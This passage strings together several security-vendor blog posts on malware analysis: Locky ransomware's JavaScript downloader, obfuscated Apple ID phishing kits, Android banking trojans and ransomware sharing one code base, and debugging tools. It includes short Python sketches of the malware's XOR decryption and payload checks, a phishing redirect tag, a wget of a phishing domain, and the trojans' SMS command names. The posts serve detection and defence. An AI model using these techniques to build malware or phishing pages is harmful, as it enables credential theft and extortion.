The parked process makes it convenient to snapshot the malware execution VM and repeatedly connect remotely to exercise and annotate different code areas with IDA Pro as the debugger. Because the same OS process can be reused for multiple debug sessions, the memory map announced by the script remains the same across debugging sessions. This means that the annotations created in IDA Pro remain relevant instead of becoming disconnected from the varying data and code locations that would result from the non-deterministic heap addresses returned by VirtualAlloc if the program were simply executed multiple times.


flare-qdb provides a command-line tool to quickly query dynamic binary state without derailing the thought process of an ongoing debugging session. In addition to querying state, flare-qdb can be used to alter program state and simulate new scenarios. For intricate cases, flare-qdb has a scripting interface permitting almost arbitrary manipulation. This can be useful for string decoding, malware unpacking, and general software analysis. Head over to the flare-qdb GitHub page to get started using it.

DHS and FBI Joint Analysis Report Confirms FireEye’s Assessment that Russian Government Likely Sponsors APT28 and APT29

On Dec. 29, 2016, the Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) released a Joint Analysis Report confirming FireEye’s long held public assessment that the Russian government likely sponsors the groups that we track as Advanced Persistent Threat (APT) 28 and APT29. We have tracked and profiled these groups through multiple investigations, endpoint and network detections, and continuous monitoring, allowing us to understand the groups’ malware, operational changes and motivations. This intelligence has been critical to protecting and informing our clients and exposing this threat.

FireEye first publicly announced that the Russian government likely sponsors APT28 in a report released in October 2014. APT28 has pursued military and political targets in the U.S. and globally, including U.S. political organizations, anti-doping agencies, NGOs, foreign and defense ministries, defense attachés, media outlets, and high profile government and private sector entities. Since at least 2007, APT28 has conducted operations using a sophisticated set of malware that employs a flexible, modular framework allowing APT28 to consistently evolve its toolset for future operations. APT28’s operations closely align with Russian military interests, and the 2016 breaches and subsequent public data leaks demonstrate the Russian government's wide-ranging approach to advancing its strategic political interests.

In July 2015, we released a report focusing on a tool used by APT29, malware that we call HAMMERTOSS. In detailing the sophistication and attention to obfuscation evident in HAMMERTOSS, we sought to explain how APT29’s tool development effort reflected a clandestine, well-resourced, state-sponsored effort. Additionally, we have observed APT29 target and breach entities including government agencies, universities, law firms and private sector targets. APT29 remains one of the most capable groups that we track, and the group’s past and recent activity is consistent with state espionage.

The Joint Analysis Report also includes indicators for another group we (then iSIGHT Partners) profiled publicly in 2014: Sandworm Team. Since 2009, this group has targeted entities in the energy, transportation and financial services industries. They have deployed destructive malware that impacted the power grid in Ukraine in late 2015 and used related malware to affect a Ukrainian ministry and other financial entities in December 2016. Chiefly characterized by their use of the well-known BlackEnergy trojan, Sandworm Team has often retrofitted publicly available malware to further their offensive operations. Sandworm Team has exhibited considerable skill and used extensive resources to conduct offensive operations.

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript-based Downloader Updates

In this campaign, a few updates were seen in both the JavaScript-based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

  5. Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

  6. Executes the decrypted payload, passing it the command line parameter “123”.
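The validation steps above can be sketched as follows. The repeating-key XOR and the helper names are illustrative stand-ins, since the actual routine is a custom multi-stage decoder:

```python
def decrypt_payload(data, key):
    """Illustrative repeating-key XOR; the real routine is a custom decoder."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def is_valid_payload(binary):
    """Size window from Figure 4 plus the MZ header check from Figure 5."""
    if not (143360 < len(binary) < 153660):
        return False
    return binary[:2] == b"MZ"
```

Only a decrypted blob that lands inside the size window and starts with “MZ” is executed; anything else is discarded and the downloader moves on to the next URL.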

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However, in the case of this Locky ransomware, the program does not exit (Figure 6); instead, the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in a program crash, as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.
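A toy model of this anti-analysis trick, with a stand-in constant and a simple XOR cipher in place of Locky's actual routine, shows why analyzing the second stage in isolation fails:

```python
CONSTANT = 0x2A  # stand-in for the constant embedded in the binary

def decrypt(blob, arg="0"):
    """Key = constant + command line parameter (zero when absent)."""
    key = (CONSTANT + int(arg)) & 0xFF
    return bytes(b ^ key for b in blob)

packed = decrypt(b"correct code", arg="123")  # "packed" with the right key
print(decrypt(packed, arg="123"))  # b'correct code'
print(decrypt(packed))             # garbage bytes: wrong key, invalid code
```

Without the “123” supplied by the first stage, the derived key is wrong and the unpacked bytes are not executable, so sandboxes that run the payload directly see only a crash.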


As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes







Rotten Apples: Apple-like Malicious Phishing Domains

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and the UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique in that they serve the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information – including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows users to store passwords and credit card information and have them entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains appeared as an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly obfuscated JavaScript that created the phishing HTML content on the web page at runtime. This technique is effective against anti-phishing systems that rely on the HTML content and analyze the forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, Appleid-yun-iCloud[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com, icluod-web-ios[.]com and ios-web-Apple[.]com.

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique in that a simple GET request to any of these domains results in encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

This encoded string strHTML passes through a complex sequence of around 23 decrypting/decoding functions, including number system conversions and pseudo-random pattern modifiers, followed by XOR decoding using the fixed key, or password, “zycode”, before the actual HTML phishing content is finally created (refer to Figure 15 and Figure 16 in Appendix 1 for the complete code). Phishing detection systems that rely solely on the HTML in the response section will completely fail to detect the code generated using this technique.
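The final stage of that chain, repeating-key XOR with the password “zycode”, can be reproduced in a few lines of Python. This covers only the last of the roughly 23 stages; the number-system and pattern decoders that precede it are omitted:

```python
def xor_decode(data: bytes, key: bytes = b"zycode") -> bytes:
    """Repeating-key XOR: applying it twice returns the original input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

html = b"<html>phishing page</html>"   # illustrative plaintext
encoded = xor_decode(html)             # "encrypt"
assert xor_decode(encoded) == html     # decoding restores the page
```

Because XOR is its own inverse, the same routine serves the kit for both encoding the page offline and decoding it in the victim's browser.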

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

Burp Suite (https://portswigger[.]net/burp/) is a tool for testing the security of web applications. The Burp session of a user supplying a login and password to the HTML form is shown in Figure 3. Here we can see five variables (u, p, x, y and cc) and a cookie being sent via the HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next, the user is presented with an ask3.asp webpage, shown in Figure 5.


Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail using Burp suite tool is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tried to supply the same Apple ID twice, they got redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirected the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

We found that the registrant names for all of these phony Apple domains were the Chinese names “Yu Hu”, “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all these domains were registered with qq[.]com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that the system had been seeing similar domains at an increasing frequency. Analyzing the registration information, we found some interesting patterns. From January 2016 to the time of writing, the system flagged around 240 unique domains related to Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique email registrants: 64 unique emails pointing to qq[.]com, 36 unique Gmail accounts, 18 unique email addresses each belonging to 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in the following ways:

  • The domain list provided here could be used by Apple customers as a blacklist; they can avoid browsing to any of the listed domains or providing credentials to them, whether the links arrive via SMS, email or any instant messaging service.
  • The Apple credential phishing detection teams could use this information, as it highlights that all domains registered with these email addresses, registrant names and addresses, as well as their combinations, are potentially malicious and serving phishing content. This information could be used to block all future domains registered by the same entities.
  • Patterns emerging from this data reveal that, for such campaigns, attackers prefer to use email addresses from Chinese services such as qq[.]com, 163[.]com and 126[.]com. It has also been observed that, instead of names, the attackers have used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.
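That last observation translates into a simple registrant-screening heuristic. The rule below is hypothetical (and uses undefanged domains for readability), not a production signature:

```python
import re

# Hypothetical heuristic: all-digit local part at a Chinese mail provider
SUSPICIOUS = re.compile(r"^\d+@(qq|163|126|139)\.com$")

def is_suspicious_registrant(email):
    """Flag registrant emails matching the numeric-local-part pattern."""
    return bool(SUSPICIOUS.match(email))

for addr in ["545454@qq.com", "891495200@qq.com", "alice@example.com"]:
    print(addr, is_suspicious_registrant(addr))
```

A real detection pipeline would combine such a rule with the registrant names and addresses above rather than rely on it alone, since legitimate users also register numeric qq accounts.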

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.


Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)...

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)||:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’


100%[============================================================================================================>] 203         --.-K/s   in 0s      


2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />
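The c and sFR values in this tag appear to be plain base64; decoding c with Python's standard library yields an opaque alphanumeric token rather than anything Apple-related:

```python
import base64

# The c parameter from the meta-refresh tag above
c = "ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA=="
decoded = base64.b64decode(c).decode("ascii")
print(decoded)  # 87250912FR549605494771975018168634818867574
```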


This code redirects the browser to this URL/page:


This loads a highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code being shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form is submitted to signin-box-disabled.php, and JavaScript and jQuery create the page seen in Figure 11, informing the user that the Apple ID provided has been locked and must be unlocked:

Figure 11: Phishing page prompting victims to unlock their Apple IDs

Clicking on unlock leads the user to the page profile.php, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country part of the address drop-down menu only allowed address options from England, Scotland and Wales, suggesting that this attack targets these regions only.

Figure 12: User information requested by phishing page

On submitting false information on this form, the user is shown a page asking them to wait while the entered information is confirmed. After a couple of seconds of processing, the page congratulates the user on their Apple ID being successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real Apple login page

Domain Registration Information

It was observed that all of these domains used the whois privacy protection feature offered by many registrars. This feature enables registrants to hide their personal and contact information, which is otherwise available via the whois service. These domains were registered with the email “contact@privacyprotect[.]org”.


All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.


Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. In Green we have highlighted functions with number system converters, pseudo-random pattern decoders and bit-level binary operators

Figure 16: Obfuscated JS served by the phishing site. In Green we have highlighted functions with number system converters, pseudo-random pattern decoders and bit-level binary operators, while in Red we have XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

For more information on phishing, please visit:


A Growing Number of Android Malware Families Believed to Have a Common Origin: A Study Based on Binary Code


On Feb. 19, IBM X-Force researchers released an intelligence report [1] stating that the source code for GM Bot was leaked to a crimeware forum in December 2015. GM Bot is a sophisticated Android malware family that emerged in the Russian-speaking cybercrime underground in late 2014. IBM also claimed that several Android malware families recently described in the security community were actually variants of GM Bot, including Bankosy [2], MazarBot [3], and the SlemBunk malware recently described by FireEye [4, 5].

Security vendors may differ in their definition of a malware “variant.” The term may refer to anything from almost identical code with slight modifications, to code that has superficial similarities (such as similar network traffic) yet is otherwise very different.

Using IBM’s reporting, we compared their GM Bot samples to SlemBunk. Based on the disassembled code of these two families, we agree that there are enough code similarities to indicate that GM Bot shares a common origin with SlemBunk. Interestingly, our research led us to identify an earlier malware family named SimpleLocker – the first known file-encryption ransomware on Android [6] – that also shares a common origin with these banking trojan families.

GM Bot and SlemBunk

Our analysis showed that the four GM Bot samples referenced by IBM researchers all share the same major components as SlemBunk. Figure 1 of our earlier report [4], reproduced here, shows the major components of SlemBunk and their corresponding class names:

  • ServiceStarter: An Android receiver that will be invoked once an app is launched or the device boots up. Its functionality is to start the monitoring service, MainService, in the background.
  • MainService: An Android service that runs in the background and monitors all running processes on the device. It prompts the user with an overlay view that resembles the legitimate app when that app is launched. This monitoring service also communicates with a remote host by sending the initial device data and notifying of device status and app preferences.
  • MessageReceiver: An Android receiver that handles incoming text messages. In addition to the functionality of intercepting the authentication code from the bank, this component also acts as the bot client for remote command and control (C2).
  • MyDeviceAdminReceiver: A receiver that requests administrator access to the Android device the first time the app is launched. This makes the app more difficult to remove.
  • Customized UI views: Activity classes that present fake login pages that mimic those of the real banking apps or social apps to phish for banking or social account credentials.

Figure 1. Major components of SlemBunk malware family

The first three GM Bot samples have the same package name as our SlemBunk sample. In addition, the GM Bot samples have five of the same major components, including the same component names, as the SlemBunk sample in Figure 1.

The fourth GM Bot sample has a different initial package name, but unpacks the real payload at runtime. The unpacked payload has the same major components as the SlemBunk sample, with a few minor changes on the class names: MessageReceiver replaced with buziabuzia, and MyDeviceAdminReceiver replaced with MDRA.

Figure 2. Code Structure Comparison between GM Bot and SlemBunk

Figure 2 shows the code structure similarity between one GM Bot sample and one SlemBunk sample (SHA256 9425fca578661392f3b12e1f1d83b8307bfb94340ae797c2f121d365852a775e and SHA256 e072a7a8d8e5a562342121408493937ecdedf6f357b1687e6da257f40d0c6b27 for GM Bot and SlemBunk, respectively). From this figure, we can see that the five major components we discussed in our previous post [4] are also present in the GM Bot sample. Other common classes include:

  • Main, the launching activity of both samples.
  • MyApplication, the application class that starts before any other activities of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.

Among all the above components and classes, MainService is the most critical one. It is started by class Main at launch time, keeps working in the background to monitor the top running process, and overlays a phishing view when a victim app (e.g., a mobile banking app) is recognized. To keep MainService running continuously, malware authors added two receivers – ServiceStarter and SDCardServiceStarter – to check its status when particular system events are received. Both GM Bot and SlemBunk samples share the same architecture. Figure 3 shows the major code of class SDCardServiceStarter to demonstrate how GM Bot and SlemBunk use the same mechanism to keep MainService running.

Figure 3. Method onReceive of SDCardServiceStarter for GM Bot and SlemBunk

From this figure, we can see that GM Bot and SlemBunk use almost identical code to keep MainService running. Note that both samples check the country in the system locale and avoid starting MainService when they find the country is Russia. The only difference is that GM Bot applies renaming obfuscation to some classes, methods and fields. For example, static variable “MainService;->a” in GM Bot has the same role as static variable “MainService;->isRunning” in SlemBunk. Malware authors commonly use this trick to make their code harder to understand. However, this does not change the fact that the underlying code shares the same origin.

Figure 4 shows the core code of class MainService to demonstrate that GM Bot and SlemBunk actually have the same logic for the main service. In Android, when a service is started, its onCreate method is called. In the onCreate method of both samples, a static variable is first set to true. In GM Bot, this variable is named “a”, while in SlemBunk it is named “isRunning”. Both then move forward to read an app-specific preference. Note that the preferences in both samples have the same name: “AppPrefs”. The last tasks of these two main services are also the same. Specifically, in order to check whether any victim apps are running, a runnable thread is scheduled. If a victim app is running, a phishing view is overlaid on top of that of the victim app. The only difference here is also in the naming of the runnable thread: class “d” in GM Bot and class “MainService$2” in SlemBunk are employed respectively to conduct the same credential phishing task.

Figure 4. Class MainService for GM Bot and SlemBunk

In summary, our investigation into the binary code similarities supports IBM’s assertion that GM Bot and SlemBunk share the same origin.

SimpleLocker and SlemBunk

IBM noted that GM Bot emerged in late 2014 in the Russian-speaking cybercrime underground. In our research, we noticed that an earlier piece of Android malware named SimpleLocker also has a code structure similar to SlemBunk and GM Bot. However, SimpleLocker has a different financial incentive: to demand a ransom from the victim. After landing on an Android device, SimpleLocker scans the device for certain file types, encrypts them, and then demands a ransom from the user in order to decrypt the files. Before SimpleLocker’s emergence, there were other types of Android ransomware that would lock the screen; however, SimpleLocker is believed to be the first file-encryption ransomware on Android.

The earliest report on SimpleLocker we identified was published by ESET in June 2014 [6]. However, we found an earlier sample in our malware database from May 2014 (SHA256 edff7bb1d351eafbe2b4af1242d11faf7262b87dfc619e977d2af482453b16cb). The compile date of this app was May 20, 2014. We compared this SimpleLocker sample to one of our SlemBunk samples (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96) using the same methods used to compare GM Bot and SlemBunk.

Figure 5 shows the code structure comparison between these two samples. Note that this SimpleLocker variant also has the major components ServiceStarter and MainService, both used by SlemBunk. However, the purpose of the main service here is not to monitor running apps and provide phishing UIs to steal banking credentials. Instead, SimpleLocker’s main service component scans the device for victim files and calls the file encryption class to encrypt files and demand a ransom. The major differences in the SimpleLocker code are shown in the red boxes: AesCrypt and FileEncryptor. Other common classes include:

  • Main, the launching activity of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.
  • Tor and OnionKit, third-party libraries for private communication.
  • TorSender, HttpSender and Utils, supporting classes to provide code for CnC communication and for collecting device information.

Figure 5. Code structure comparison between SimpleLocker and SlemBunk samples

Finally, we located another SimpleLocker sample (SHA256 304efc1f0b5b8c6c711c03a13d5d8b90755cec00cac1218a7a4a22b091ffb30b) from July 2014, about two months after the first SimpleLocker sample. This new sample did not use Tor for private communication, but shared four of the five major components with the SlemBunk sample (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96). Figure 6 shows the code structure comparison between these two samples.

Figure 6. Code structure comparison between SimpleLocker and SlemBunk variants

As we can see in Figure 6, the new SimpleLocker sample used a packaging mechanism similar to SlemBunk, putting HttpSender and Utils into a sub-package named “utils”. It also added two other major components that were originally only seen in SlemBunk: MessageReceiver and MyDeviceAdminReceiver. In total, this SimpleLocker variant shares four out of five major components with SlemBunk.

Figure 7 shows the major code of MessageReceiver in the previous samples, demonstrating that SimpleLocker and SlemBunk use essentially the same process and logic to communicate with the CnC server. First, class MessageReceiver registers itself to handle incoming short messages, whose arrival triggers its onReceive method. As seen in the figure, the main logic is basically the same in SimpleLocker and SlemBunk. Both first read the value of a particular key from the app preferences. Note that the names of the key and the shared preference are identical across these two malware families: the key is named “CHECKING_NUMBER_DONE” and the preference is named “AppPrefs”. Both then call method retrieveMessage to retrieve the short messages, and forward the control flow to class SmsProcessor. The only difference is that SimpleLocker adds one extra method, named processControlCommand, to forward control flow.

Class SmsProcessor defines the CnC commands supported by the malware families. Looking into class SmsProcessor, we identified more evidence that SimpleLocker and SlemBunk are of the same origin. First, the CnC commands supported by SimpleLocker are actually a subset of those supported by SlemBunk. In SimpleLocker, the CnC commands include "intercept_sms_start", "intercept_sms_stop", "control_number" and "send_sms", all of which are also present in the SlemBunk sample. What is more, in both SimpleLocker and SlemBunk there is a common prefix “#” before the actual CnC command. This kind of peculiarity is a good indicator that SimpleLocker and SlemBunk share a common origin.
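To illustrate, the shared dispatch logic can be modeled roughly as follows (a Python sketch; the “#” prefix and the command names are taken from the samples, while the parsing details are assumptions on our part):

```python
# Simplified model of the SmsProcessor command dispatch shared by
# SimpleLocker and SlemBunk. The "#" prefix and the command names come from
# the decompiled samples; the tokenizing logic is an illustrative guess.

COMMAND_PREFIX = "#"

# SimpleLocker's CnC commands -- a subset of those supported by SlemBunk.
SIMPLELOCKER_COMMANDS = {
    "intercept_sms_start",
    "intercept_sms_stop",
    "control_number",
    "send_sms",
}

def dispatch(message, supported):
    """Return the command name if the SMS carries a supported CnC command."""
    if not message.startswith(COMMAND_PREFIX):
        return None  # ordinary SMS, not a CnC instruction
    body = message[len(COMMAND_PREFIX):].strip()
    if not body:
        return None
    command = body.split()[0]
    return command if command in supported else None
```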

Figure 7. Class MessageReceiver for SimpleLocker and SlemBunk variants

The task of class MyDeviceAdminReceiver is to request device administrator privilege, which makes these malware families harder to remove. SimpleLocker and SlemBunk are also highly similar in this respect, supporting the same set of device admin relevant functionalities.

At this point, we can see that these variants of SimpleLocker and SlemBunk share four out of five major components and share the same supporting utilities. The only difference is in the final payload, with SlemBunk phishing for banking credentials while SimpleLocker encrypts certain files and demands ransom. This leads us to believe that SimpleLocker came from the same original code base as SlemBunk.

Conclusion
Our analysis confirms that several Android malware families share a common origin, and that the first known file-encrypting ransomware for Android – SimpleLocker – is based on the same code as several banking trojans. Additional research may identify other related malware families.

Individual developers in the cybercrime underground have been proficient in writing and customizing malware. As we have shown, malware with specific and varied purposes can be built on a large base of shared code used for common functions such as gaining administrative privileges, starting and restarting services, and CnC communications. This is apparent simply from looking at known samples related to GM Bot – from SimpleLocker that is used for encryption and ransomware, to SlemBunk that is used as a banking Trojan and for credential theft, to the full-featured MazarBot backdoor.

With the leak of the GM Bot source code, the number of customized Android malware families based on this code will certainly increase. Binary code-based study, one of FireEye Labs’ major research tools, can help us better characterize and track malware families and their relationships, even without direct access to the source code. Fortunately, the similarities across these malware families make them easier to identify, ensuring that FireEye customers are well protected.


[1]. Android Malware About to Get Worse: GM Bot Source Code Leaked
[2]. Android.Bankosy: All ears on voice call-based 2FA
[3]. MazarBOT: Top class Android datastealer
[6]. ESET Analyzes Simplocker – First Android File-Encrypting, TOR-enabled Ransomware


FLARE Script Series: flare-dbg Plug-ins


This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. In this post, we continue to discuss the flare-dbg project. If you haven’t read my first post on using flare-dbg to automate string decoding, be sure to check it out!

We created the flare-dbg Python project to support the creation of plug-ins for WinDbg. When we harness the power of WinDbg during malware analysis, we gain insight into runtime behavior of executables. flare-dbg makes this process particularly easy. This blog post discusses WinDbg plug-ins that were inspired by features from other debuggers and analysis tools. The plug-ins focus on collecting runtime information and interacting with malware during execution. Today, we are introducing three flare-dbg plug-ins, which are summarized in Table 1.

Table 1: flare-dbg plug-in summary

To demonstrate the functionality of these plug-ins, this post uses a banking trojan (MD5: 03BA3D3CEAE5F11817974C7E4BE05BDE) known to FireEye as TINBA.


injectfind
A common technique used by malware is code injection. When malware allocates a memory region to inject code into, the created region exhibits certain characteristics that we can use to identify it in a process’s memory space. The injectfind plug-in finds and displays information about injected regions of memory from within WinDbg.

